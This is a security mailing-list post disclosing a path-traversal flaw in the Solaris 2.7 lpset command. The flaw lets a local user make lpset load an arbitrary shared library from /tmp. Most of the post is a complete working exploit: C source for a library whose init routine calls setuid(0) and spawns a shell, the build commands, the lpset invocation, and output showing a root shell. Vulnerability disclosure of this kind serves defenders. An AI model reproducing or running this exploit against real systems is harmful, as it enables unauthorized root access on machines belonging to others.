Solaris/SPARC 2.7 lpset exploit (well not likely !)

[noir () GSU LINUX ORG TR (noir)]

Hi,

lpset seems to use strcat() to pass the argument for -r flag
 ( /usr/lib/print/lib/../../../../tmp/foo) and appends .so to the end.
in this case /tmp/foo.so is going to be dlopen
but there is a special case /usr/lib/print/lib directory has to exist.
xploit shell script is attached.

$ uname -a
SunOS karate 5.7 Generic_106541-07 sun4u sparc SUNW,Ultra-5_10
$ id
uid=118(noir) gid=120(boha)
$ cd /tmp
$ cat > foo.c
#include <stdlib.h>
#include <unistd.h>
void
_init(void)
{
setuid(0);
system("/bin/sh");
}
^C$ /usr/local/bin/gcc -fPIC -c foo.c -g -DSOLARIS -Wall
$ ld -G -o foo.so foo.o -ldl
$ lpset -n xfn -r /../../../../tmp/foo foo
# id
uid=0(root) gid=120(boha)
#

Respect,
noir

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.0i for non-commercial use

mQENAzfpmZ4AAAEIALEp8z+/6SXHZ2IYf0PQnsyCm+9hfHxlQwWQs6BI5rBQdX9J
GuSqJfGX3w+fS9xl6MWRlvno3Nmnk66QhBgs8LnunmyhtFN03TBfq7mGoBYKb79R
4jX/kjGUg9oUCr+6sqwN3bXp812qKpScxKVMvMCtQissVzDLdA01U1wCFhMg7xBQ
N9lP8tJQ1gtKUnzdsnFgsLkgT3uN+Ek7bQdmwz9a1Xqcq2jxVj5j4yEErQoY3J8m
viV+u8mr/Wo0vWEGwIeCWOKNi6SXGz69Pd9a+JRjYIBnuu33o64aEYoMGbFdslNM
KbWxsXJJAwtw4/JqKt/LosYAFreteGhdA56c7JsABRG0IE5vaXIgU2luIDxub2ly
QGdzdS5saW51eC5vcmcudHI+iQEVAwUQN+mZnnhoXQOenOybAQG16Af8Dk4ZRciA
M1Fwq/fJOQJ/kcdszFHAEVHh1nToC99b+ZeoX2I3AIzrpYl0aGZBWQeGbtG4FZuz
ldWQcvT8jsQ1M1FraAZgKIzukxAxiOJL1twlQJyEDYQ3wwyWIXXqS3c1/jl7PgC1
iv7RQXxxLRn9qFPJQcaJavxRAAVytkDQWocTguRaehtdZsjxLmH2eE7cGQe0N9aL
JJfq0XLl1NjeV5pu5oTkc90/aJ/uHxPOStmPULm5WZP6nCTaQ28lPJBaDV8pLdPo
dSg+kvlvhi+k7UgAdvsETA/I6paFyOLq8lFdORA/GHof89NQX3OyJmDGTknfKtAf
9Ky2NbzA12r6zQ==
=o1d1
-----END PGP PUBLIC KEY BLOCK-----

<HR NOSHADE>
<UL>
<LI>application/x-sh attachment: lpset.sh
</UL>